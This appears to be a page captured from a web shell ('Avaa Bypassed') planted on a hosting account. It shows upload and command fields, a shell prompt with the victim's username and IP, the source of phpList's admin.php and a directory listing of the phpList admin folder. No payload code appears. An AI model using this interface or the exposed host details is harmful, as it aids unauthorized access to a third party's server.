[ Avaa Bypassed ]

Upload:

Command:

hmhc3928@3.129.42.59: ~ $ 
<?php

require_once dirname(__FILE__).'/accesscheck.php';

$start = sprintf('%d',!empty($_GET['start'])?$_GET['start']:0);
print PageLinkActionButton("admins",$GLOBALS['I18N']->get('List of Administrators'),"start=$start");

require dirname(__FILE__) . "/structure.php";

$struct = $DBstruct["admin"];
$id = !empty($_REQUEST["id"]) ? sprintf('%d',$_REQUEST["id"]) : 0;
$find = isset($_REQUEST['find']) ? $_REQUEST['find'] : '';
$start = isset($_GET['start']) ? sprintf('%d',$_GET['start']):0;

echo "<hr /><br />";

$noaccess = 0;
$accesslevel = accessLevel("admin");
switch ($accesslevel) {
  case "owner":
    $id = $_SESSION["logindetails"]["id"];break;
  case "all":
    $subselect = "";break;
  case "none":
  default:
    $noaccess = 1;
}
if ($noaccess) {
  print Error($GLOBALS['I18N']->get('No Access'));
  return;
}

if (!empty($_POST["change"])) {
  if (!verifyToken()) { ## csrf check, should be added in more places
    print Error($GLOBALS['I18N']->get('No Access'));
    return;
  }
  if (empty($_POST["id"])) {
    # Check if fields login name and email are present
    if(!is_null($_POST["loginname"]) && $_POST["loginname"] !== '' && !is_null($_POST["email"]) && $_POST["email"] !== '') {
      if(validateEmail($_POST["email"])) {
        # new one
        $result = Sql_query(sprintf('SELECT count(*) FROM %s WHERE namelc="%s" OR email="%s"',
           $tables["admin"],strtolower(normalize($_POST["loginname"])),strtolower(normalize($_POST["email"]))));
        $totalres = Sql_fetch_Row($result);
        $total = $totalres[0]; 
        if (!$total) {
          Sql_Query(sprintf('insert into %s (loginname,namelc,password,created) values("%s","%s","%s",current_timestamp)',
            $tables["admin"],strtolower(normalize($_POST["loginname"])),strtolower(normalize($_POST["loginname"])),encryptPass(md5(rand(0,1000)))));
          $id = Sql_Insert_Id($tables['admin'], 'id');
        } else {
          $id = 0;
        }
      } else {
        ## email doesn't validate
        $id = 0;
      }
    } else {
      $id = 0;
    }
  } else {
    $id = sprintf('%d',$_POST["id"]);
    ##17388 - disallow changing an admin email to an already existing one
    if (!empty($_POST['email'])) {
      $exists = Sql_Fetch_Row_Query(sprintf('select id from %s where email = "%s"',$tables['admin'],sql_escape($_POST['email'])));
      if (!empty($exists[0]) && $exists[0] != $id) {
        Error(s('Cannot save admin, that email address already exists for another admin'));
        print PageLinkButton('admin&id='.$id,s('Back to edit admin'));
        return;
      }
    }
  }

  if ($id) {
    print '<div class="actionresult">';
    reset($struct);
    while (list ($key,$val) = each ($struct)) {
      $a = $b = '';
      if (strstr($val[1],':'))
        list($a,$b) = explode(":",$val[1]);
      if ($a != "sys" && isset($_POST[$key])){
        Sql_Query("update {$tables["admin"]} set $key = \"".addslashes($_POST[$key])."\" where id = $id");        
      }
    }
    if (ENCRYPT_ADMIN_PASSWORDS && !empty($_POST['updatepassword'])){
      //Send token email.
      print sendAdminPasswordToken($id). '<br/>';
    ## check for password changes
    } elseif (isset($_POST['password'])) {
    #  Sql_Query("update {$tables["admin"]} set password = \"".sql_escape($_POST['password'])."\" where id = $id");
    }
    if (isset($_POST["attribute"]) && is_array($_POST["attribute"])) {
      while (list($key,$val) = each ($_POST["attribute"])) {
        Sql_Query(sprintf('replace into %s (adminid,adminattributeid,value)
          values(%d,%d,"%s")',$tables["admin_attribute"],$id,$key,addslashes($val)));
      }
    }
    $privs = array(
      'subscribers' => !empty($_POST['subscribers']),
      'campaigns' => !empty($_POST['campaigns']),
      'statistics' => !empty($_POST['statistics']),
      'settings' => !empty($_POST['settings'])
    );
    Sql_Query(sprintf('update %s set modified=now(), modifiedby = "%s", privileges = "%s" where id = %d',
      $GLOBALS['tables']["admin"],adminName($_SESSION["logindetails"]["id"]),sql_escape(serialize($privs)),$id));

    print $GLOBALS['I18N']->get('Changes saved');
    print '</div>';
  } else {
    Error($GLOBALS['I18N']->get('Error adding new admin, login name and/or email not inserted, email not valid or admin already exists'));
  }
}

if (!empty($_GET["delete"])) {
  $delete = sprintf('%d',$_GET['delete']);
  # delete the index in delete
  print $GLOBALS['I18N']->get('Deleting')." $delete ..\n";
  if ($delete != $_SESSION["logindetails"]["id"]) {
    Sql_query(sprintf('delete from %s where id = %d',$GLOBALS["tables"]["admin"],$delete));
    Sql_query(sprintf('delete from %s where adminid = %d',$GLOBALS["tables"]["admin_attribute"],$delete));
    print '..'.$GLOBALS['I18N']->get('Done');
  } else {
    print '..'.$GLOBALS['I18N']->get('Failed, you cannot delete yourself');
  }  
  print "<br /><hr/><br />\n";
}

print '<div class="panel">';

if ($id) {
  print '<h3>'.$GLOBALS['I18N']->get('Edit Administrator').': ';
  $result = Sql_query("SELECT * FROM {$tables["admin"]} where id = $id");
  $data = sql_fetch_assoc($result);
  print $data["loginname"]. '</h3>';
  if ($data["id"] != $_SESSION["logindetails"]["id"] && $accesslevel == "all")
    printf( "<br /><a href=\"javascript:deleteRec('%s');\">Delete</a> %s\n",PageURL2("admin","","delete=$id"),$data["loginname"]);
} else {
  $data = array();
  print '<h3>'.$GLOBALS['I18N']->get('Add a new Administrator').'</h3>';
}

print '<div class="content">';
#var_dump($data);


print formStart(' class="adminAdd"');
printf('<input type="hidden" name="id" value="%d" /><table class="adminDetails" border="1">',$id);

if (isset($data['privileges'])) {
  $privileges = unserialize($data['privileges']);
} else {
  $privileges = array( 
  );
}

reset($struct);
while (list ($key,$val) = each ($struct)) {
  $a = $b = '';
  if (empty($data[$key])) $data[$key] = '';
  if (strstr($val[1],':'))
    list($a,$b) = explode(":",$val[1]);
  if ($a == "sys") {
    if ($b == 'Privileges') { ## this whole thing of using structure is getting silly, @@TODO rewrite without
    } else
  	#If key is 'password' and the passwords are encrypted, locate two radio buttons to allow an update.
  	if ($b == 'Password' && ENCRYPT_ADMIN_PASSWORDS){
      $changeAdminPass = !empty($_SESSION['firstinstall']);
      if ($changeAdminPass) {
        $checkNo = '';
        $checkYes = 'checked="checked"';
      } else {
        $checkYes = '';
        $checkNo = 'checked="checked"';
      }
      
  	  printf('<tr><td>%s (%s)</td><td>%s<input type="radio" name="updatepassword" value="0" %s>%s</input>
                               <input type="radio" name="updatepassword" value="1" %s>%s</input></td></tr>
', 
		 $GLOBALS['I18N']->get('Password'), $GLOBALS['I18N']->get('hidden'), 
		 (ENCRYPT_ADMIN_PASSWORDS?$GLOBALS['I18N']->get('Update it?'):$GLOBALS['I18N']->get('Remind it?')), 
      $checkNo,
		 $GLOBALS['I18N']->get('No'), $checkYes, $GLOBALS['I18N']->get('Yes'));
  	} else {
      if ($b != 'Password'){
        printf('<tr><td>%s</td><td>%s</td></tr>',$GLOBALS['I18N']->get($b),$data[$key]);
      } else {
        printf('<tr><td>%s</td><td><input type="text" name="%s" value="%s" size="30" /></td></tr>'."\n",$GLOBALS['I18N']->get('Password'),$key,stripslashes($data[$key]));
      }
    }
  } elseif ($key == "loginname" && $data[$key] == "admin") {
    printf('<tr><td>'.$GLOBALS['I18N']->get('Login Name').'</td><td>admin</td>');
    print('<td><input type="hidden" name="loginname" value="admin" /></td></tr>');
  } 
  	elseif ($key == "superuser" || $key == "disabled") {
      if ($accesslevel == "all") {
      	#If key is 'superuser' or 'disable' locate a boolean combo box.
        printf('<tr><td>%s</td><td>', $GLOBALS['I18N']->get($val[1]));
	    printf('<select name="%s" size="1">', $key);
	    print('<option value="1" '.(!empty($data[$key])?' selected="selected"':'').'>'.$GLOBALS['I18N']->get('Yes').'</option>');
	    print('<option value="0" '.(empty($data[$key])?' selected="selected"':'').'>'.$GLOBALS['I18N']->get('No').'</option></select>');
		print('</td></tr>'."\n");
      }
  } elseif (!empty($val[1]) && !strpos($key,'_')) {
      printf('<tr><td>%s</td><td><input type="text" name="%s" value="%s" size="30" /></td></tr>'."\n",$GLOBALS['I18N']->get($val[1]),$key,htmlspecialchars(stripslashes($data[$key])));
  }
}
$res = Sql_Query("select
  {$tables["adminattribute"]}.id,
  {$tables["adminattribute"]}.name,
  {$tables["adminattribute"]}.type,
  {$tables["adminattribute"]}.tablename from
  {$tables["adminattribute"]}
  order by {$tables["adminattribute"]}.listorder");
while ($row = Sql_fetch_array($res)) {
  if ($id) {
    $val_req = Sql_Fetch_Row_Query("select value from {$tables["admin_attribute"]}
      where adminid = $id and adminattributeid = $row[id]");
    $row["value"] = $val_req[0];
  } else {
    $row['value'] = '';
  }

  if ($row["type"] == "checkbox") {
    $checked_index_req = Sql_Fetch_Row_Query("select id from $table_prefix"."adminattr_".$row["tablename"]." where name = \"Checked\"");
    $checked_index = $checked_index_req[0];
    $checked = $checked_index == $row["value"]?'checked="checked"':'';
    printf('<tr><td>%s</td><td><input class="attributeinput" type="hidden" name="cbattribute[]" value="%d" />
<input class="attributeinput" type="checkbox" name="attribute[%d]" value="Checked" %s /></td></tr>'."\n",$row["name"],$row["id"],$row["id"],$checked);
  } else {
    if ($row["type"] != "textline" && $row["type"] != "hidden") {
      printf ("<tr><td>%s</td><td>%s</td></tr>\n",$row["name"],AttributeValueSelect($row["id"],$row["tablename"],$row["value"],"adminattr"));
    } else {
      printf('<tr><td>%s</td><td><input class="attributeinput" type="text" name="attribute[%d]" value="%s" size="30" /></td></tr>'."\n",$row["name"],$row["id"],htmlspecialchars(stripslashes($row["value"])));
    }
  }
}

print '<tr><td colspan="2">';

$checked = array();
foreach ($privileges as $section => $allowed) {
  if (!empty($allowed)) {
    $checked[$section] = 'checked="checked"';
  } else {
    $checked[$section] = '';
  }
}

print '<div id="privileges">
'.s('Privileges').':
<label for="subscribers"><input type="checkbox" name="subscribers" '.$checked['subscribers'].' />'.s('Manage subscribers').'</label>
<label for="campaigns"><input type="checkbox" name="campaigns" '.$checked['campaigns'].'/>'.s('Send Campaigns').'</label>
<label for="statistics"><input type="checkbox" name="statistics" '.$checked['statistics'].'/>'.s('View Statistics').'</label>
<label for="settings"><input type="checkbox" name="settings" '.$checked['settings'].'/>'.s('Change Settings').'</label>
</div>';
print '</td></tr>';

print '<tr><td colspan="2"><input class="submit" type="submit" name="change" value="'.$GLOBALS['I18N']->get('Save Changes').'" /></td></tr></table>';


print '</div>'; # content
print '</div>'; # panel

print "</form>";

Filemanager

DIR : / home/ hmhc3928/ public_html_community/ phplist/ admin/
Name Type Size Permission Actions
FCKeditor Folder 0755
PEAR Folder 0755
PHPMailer Folder 0755
PHPMailer6 Folder 0755
actions Folder 0755
auth Folder 0755
commonlib Folder 0755
css Folder 0755
data Folder 0755
help Folder 0755
images Folder 0755
inc Folder 0755
info Folder 0755
js Folder 0755
lan Folder 0755
locale Folder 0755
oldmailer Folder 0755
onyxrss Folder 0755
plugins Folder 0755
styles Folder 0755
tests Folder 0755
ui Folder 0755
uploadimages Folder 0755
.gitignore File 20 B 0644
.htaccess File 171 B 0644
.minceconf File 994 B 0644
AnalyticsQuery.php File 985 B 0644
CsvReader.php File 1.27 KB 0644
EmailSender.php File 477 B 0644
about.php File 4.22 KB 0644
accesscheck.php File 1.51 KB 0644
addprefix.php File 966 B 0644
adduser.php File 46 B 0644
admin.php File 10.68 KB 0644
adminattributes.php File 6.39 KB 0644
admins.php File 4.54 KB 0644
adodb.inc File 6.49 KB 0644
analytics.php File 2.84 KB 0644
attributes.php File 102 B 0644
blacklistemail.php File 1.04 KB 0644
bounce.php File 10.09 KB 0644
bouncemgt.php File 1.39 KB 0644
bouncerule.php File 3 KB 0644
bouncerules.php File 5.86 KB 0644
bounces.php File 6.01 KB 0644
catlists.php File 2.64 KB 0644
checkbouncerules.php File 1.34 KB 0644
checki18n.php File 2.69 KB 0644
checkprerequisites.php File 1.05 KB 0644
class.html.mime.mail-outlookfix.inc File 19.93 KB 0644
class.html.mime.mail.inc File 19.35 KB 0644
class.image.inc File 5.77 KB 0644
class.phplistmailer.php File 24.23 KB 0644
class.phplistmailerbase.php File 1.5 KB 0644
community.php File 1.78 KB 0644
communityfeed.php File 2.36 KB 0644
configure.php File 5.25 KB 0644
connect.php File 74.36 KB 0644
convertstats.php File 5.51 KB 0644
converttoutf8.php File 3.77 KB 0644
cron.php File 3.37 KB 0644
date.php File 6.08 KB 0644
dbcheck.php File 111 B 0644
defaultFrontendTexts.php File 9.57 KB 0644
defaultconfig.inc File 23.52 KB 0644
defaultconfig.php File 24.92 KB 0644
defaultplugin.php File 23.31 KB 0644
defaults.php File 2.83 KB 0644
defaultsystemtemplate.php File 1.83 KB 0644
defaulttest.php File 1.12 KB 0644
dlusers.php File 232 B 0644
domainbounces.php File 507 B 0644
domainstats.php File 2.83 KB 0644
editattributes.php File 6.7 KB 0644
editlist.php File 6.79 KB 0644
error_log File 274 B 0644
eventlog.php File 4.49 KB 0644
export.php File 4.84 KB 0644
exportuserdata.php File 6.36 KB 0644
fckphplist.php File 43.21 KB 0644
footer.inc File 1.19 KB 0644
footer.old.inc File 1.82 KB 0644
gchart.php File 869 B 0644
generatebouncerules.php File 5.24 KB 0644
getrss.php File 3.94 KB 0644
header.inc File 1.75 KB 0644
home.php File 16.36 KB 0644
hostedprocessqueuesetup.php File 1.64 KB 0644
htaccess File 311 B 0644
image.php File 795 B 0644
import.php File 2.54 KB 0644
import1.php File 9.41 KB 0644
import2.php File 243 B 0644
import3.php File 20.26 KB 0644
import4.php File 15.63 KB 0644
importadmin.php File 14.5 KB 0644
importlib.php File 2.86 KB 0644
importsimple.php File 5.84 KB 0644
index.php File 22.53 KB 0644
index.php.old File 22.53 KB 0644
info.php File 1.01 KB 0644
init.php File 21.7 KB 0644
initialise.php File 10.02 KB 0644
initlanguages.php File 794 B 0644
languages.php File 22.43 KB 0644
lib.php File 59.85 KB 0644
list.php File 11.79 KB 0644
listbounces.php File 4.64 KB 0644
login.php File 6.05 KB 0755
logout.php File 224 B 0644
massremove.php File 1.81 KB 0644
massunconfirm.php File 1.52 KB 0644
mclicks.php File 9.55 KB 0644
members.php File 16.58 KB 0644
mergeduplicates.php File 4.28 KB 0644
message.php File 7.27 KB 0644
messages.php File 18.94 KB 0644
mimePart.php File 10.7 KB 0644
minify.txt File 201 B 0644
msgbounces.php File 3.79 KB 0644
msgstatus.php File 1.18 KB 0644
mviews.php File 7.88 KB 0644
mysql.inc File 11.19 KB 0644
mysqli.inc File 11.58 KB 0644
pageaction.php File 1.08 KB 0644
pagetop.php File 1.17 KB 0644
phpListAdminAuthentication.php File 7.2 KB 0644
pluginlib.php File 6.39 KB 0644
plugins.php File 10.32 KB 0644
preparesend.php File 627 B 0644
processbounces.php File 29.71 KB 0644
processqueue.php File 3.73 KB 0644
purgerss.php File 1.38 KB 0644
readtestmail.php File 11.26 KB 0644
reconcileusers.php File 25.16 KB 0644
redirecttoupdater.php File 170 B 0644
reindex.php File 1.69 KB 0644
rsslib.php File 2.8 KB 0644
runcommand.php File 583 B 0644
send.php File 5.58 KB 0644
send_core.php File 56.08 KB 0644
sendemaillib.php File 64.2 KB 0644
sendprepared.php File 4.33 KB 0644
sessionlib.php File 2.92 KB 0644
setpermissions.php File 1.57 KB 0644
setup.php File 3.21 KB 0644
sidebar.php File 2.67 KB 0644
spage.php File 3.29 KB 0644
spageedit.php File 17.07 KB 0644
statsmgt.php File 1.22 KB 0644
statsoverview.php File 7.62 KB 0644
stresstest.php File 5.1 KB 0644
structure.php File 26.79 KB 0644
subscribelib2.php File 66.02 KB 0644
subscriberstats.php File 591 B 0644
suppressionlist.php File 1.71 KB 0644
system.php File 784 B 0644
systemstats.php File 7.71 KB 0644
template.php File 12.72 KB 0644
templates.php File 3.02 KB 0644
tests.php File 1.57 KB 0644
uclicks.php File 6.52 KB 0644
update.php File 187 B 0644
updateLib.php File 2.77 KB 0644
updatetlds.php File 399 B 0644
updatetranslation.php File 1.94 KB 0644
upgrade.php File 29.03 KB 0644
user.php File 2.35 KB 0644
usercheck.php File 2.27 KB 0644
userclicks.php File 8 KB 0644
userhistory.php File 127 B 0644
usermgt.php File 1.83 KB 0644
users.php File 393 B 0644
vCard.php File 1.9 KB 0644
viewmessage.php File 610 B 0644
viewrss.php File 4.07 KB 0644
viewtemplate.php File 1.82 KB 0644
vote.php File 38 B 0644